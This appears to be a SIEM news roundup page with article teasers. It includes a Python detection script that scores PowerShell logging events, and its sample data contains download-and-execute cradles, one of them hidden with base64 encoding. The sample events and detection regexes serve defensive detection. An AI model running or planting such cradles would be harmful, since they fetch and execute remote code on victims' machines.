
SIEM

The latest news and information on Security Information and Event Management.

5 advantages of deploying a cloud SIEM solution

As organizations rapidly move to the cloud, the services they depend on are moving with them, including cybersecurity solutions such as SIEM. SIEM as a Service is gaining momentum as an alternative to traditional, on-premises SIEM deployments. In its report 10 Questions to Answer Before Adopting a SaaS SIEM, Gartner predicted that by 2023, 80% of SIEM solutions would have capabilities delivered via the cloud.

Visualize activity in your cloud environment with Datadog Cloud SIEM Investigator

Investigating the origin of activity in cloud-native infrastructure—and understanding which activity is a potential threat—can be a challenging, time-consuming task for organizations. Cloud environments are complex by nature, comprising thousands of ephemeral, interconnected resources that generate large volumes of alerts, logs, metrics, and other data at any given time.

Great Power(Shell) doesn't always come with great responsibility: Sometimes, SIEM is all you need

Fileless threats are on the rise. In these attacks, cybercriminals use software already present on the victim's system instead of delivering a malicious attachment or file. More often than not, the attacker's tool of choice for a fileless attack is PowerShell.
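The point of the post above is that PowerShell abuse leaves telemetry a SIEM can already see. The following is an added example, not code from the original article or from any vendor: a small scoring rule set run over constructed events shaped like flattened Windows PowerShell script block logging records (Event ID 4104). The rule names, weights, threshold, field names (`host`, `user`, `event_id`, `script_block`) and the four sample events are all assumptions made for illustration. It shows the one step that is easy to forget in a SIEM rule: decoding `-EncodedCommand` before matching, so a base64-wrapped download cradle is scored the same as a plaintext one.

```python
import base64
import re

# Rule name -> (regex applied to a script block, weight).
# Illustrative patterns for common PowerShell abuse; not a vendor rule set.
RULES = {
    "download_cradle": (re.compile(
        r"Net\.WebClient.*?Download(?:String|File)"
        r"|(?:Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b).*?(?:\bIEX\b|Invoke-Expression)"
        r"|(?:\bIEX\b|Invoke-Expression).*?(?:Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b)",
        re.I), 4),
    "encoded_command": (re.compile(
        r"-(?:encodedcommand|enc|ec|e)\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    "hidden_window": (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    "inline_eval": (re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    "policy_bypass": (re.compile(
        r"-(?:ep|executionpolicy)\s+bypass|-nop(?:rofile)?\b", re.I), 1),
}
ALERT_THRESHOLD = 4  # assumed cut-off; tune against your own false-positive rate

ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(script_block):
    """Return the plaintext behind -EncodedCommand, or None if absent/invalid.
    PowerShell expects the argument to be base64 over UTF-16LE text."""
    m = ENCODED_ARG.search(script_block)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event):
    """Score one script block. Rules run over the raw block and, when present,
    over the decoded -EncodedCommand payload, so encoding alone hides nothing."""
    raw = event["script_block"]
    decoded = decode_encoded_command(raw)
    hits = set()
    for text in (raw, decoded or ""):
        for name, (pattern, _weight) in RULES.items():
            if pattern.search(text):
                hits.add(name)
    score = sum(RULES[name][1] for name in hits)
    return {"host": event["host"], "user": event["user"],
            "hits": sorted(hits), "score": score, "decoded": decoded}


def triage(events, threshold=ALERT_THRESHOLD):
    """Return findings at or above the threshold, highest score first."""
    findings = (analyze(e) for e in events)
    return sorted((f for f in findings if f["score"] >= threshold),
                  key=lambda f: f["score"], reverse=True)


def _encode_ps(command):
    # Builds the sample the way `powershell -EncodedCommand` expects it.
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not real telemetry), already normalized from
# Event ID 4104 records into flat dicts by an assumed log pipeline.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "alice", "event_id": 4104,
     "script_block": "Get-ChildItem C:\\Reports | Sort-Object LastWriteTime"},
    {"host": "ws02", "user": "bob", "event_id": 4104,
     "script_block": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"},
    {"host": "ws03", "user": "carol", "event_id": 4104,
     "script_block": "powershell.exe -nop -w hidden -enc " + _encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/b.ps1')")},
    {"host": "ws04", "user": "dave", "event_id": 4104,
     "script_block": "Invoke-WebRequest https://intranet.example/report.csv -OutFile r.csv"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"{finding['host']}/{finding['user']} score={finding['score']} "
              f"hits={','.join(finding['hits'])}")
        if finding["decoded"]:
            print(f"  decoded: {finding['decoded']}")
```

The benign `Invoke-WebRequest ... -OutFile` on ws04 scores zero because the cradle rule needs a download paired with inline evaluation, not a download on its own; the encoded event on ws03 scores highest because the decoded payload adds the cradle and `IEX` hits on top of the obfuscation indicators. Only script block logging gives you the decoded text server-side; if it is not enabled, the SIEM sees the base64 and nothing more.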

CTO Talk: Eight Built-in Layers of Threat-Fighting Weapons

LogSentinel’s operational security platform (SIEM, XDR & SOAR) continuously tunes the models of its specialized threat systems and layers eight anti-threat modules. Drawing on user-behavior characteristics and traffic analysis, these local modules form an iron wall against telecommunication and network threats and protect users’ communications and property.

Behind the scenes: The making of a Global Threat Report

The first Elastic Global Threat Report was published earlier this week. In it, you will learn about trends observed by our threat researchers, our predictions for what’s coming next, and some of our recommendations to operate securely in the face of today’s and tomorrow’s threats. If you haven’t read it yet, go check it out. As a technical leader in Elastic Security, I'd like to reveal a small amount about what goes into reports like this one and why it’s significant.

Why I'm excited about the 2022 Elastic Global Threat Report

I remember where I was sitting when I read Mandiant’s first M-Trends report on the advanced persistent threat in 2010. I was a technical director at the National Security Agency in the office of Tailored Access Operations (TAO). At that time, my job was to build computer network exploitation (CNE) tools to collect foreign intelligence.

Detection notes: In-memory Office application token theft

When we hear the term “Credential Access”, our thoughts as detection engineers typically turn to the Windows LSASS process and tools like Mimikatz. Recently, however, researchers have drawn our attention to Microsoft Office processes, which also store credential material in the form of access tokens.

2022 Elastic Global Threat Report: Helping security leaders navigate today's threat landscape

Staying up-to-date on the current state of security and understanding the implications of today’s growing threat landscape is critical to my role as CISO at Elastic. Part of this includes closely following the latest security threat reports, highlighting trends, and offering valuable insights into methods bad actors use to compromise environments.

How to take DevSecOps to the next level: A conversation with SecOps and DevOps leaders from NielsenIQ, ARA Security and Techstrong Group

When delivering customer experiences from the cloud, defending the app includes the data it houses and the business it represents. The DevSecOps mindset, “You build it, you run it, you secure it” helps, but only when all teams are empowered with the info they need to see a threat, regardless of where it is.

K-12 schools are struggling with cybersecurity - Here's how a SIEM can help

K-12 school districts in the U.S. are struggling with cybersecurity. According to an October 2022 GAO report, ransomware attacks have cost schools up to three weeks of missed learning, and the GAO noted that recovery can take as long as nine months. In January 2021, 3,000 K-12 public schools in the U.S. were victims of a large-scale worldwide cyberattack.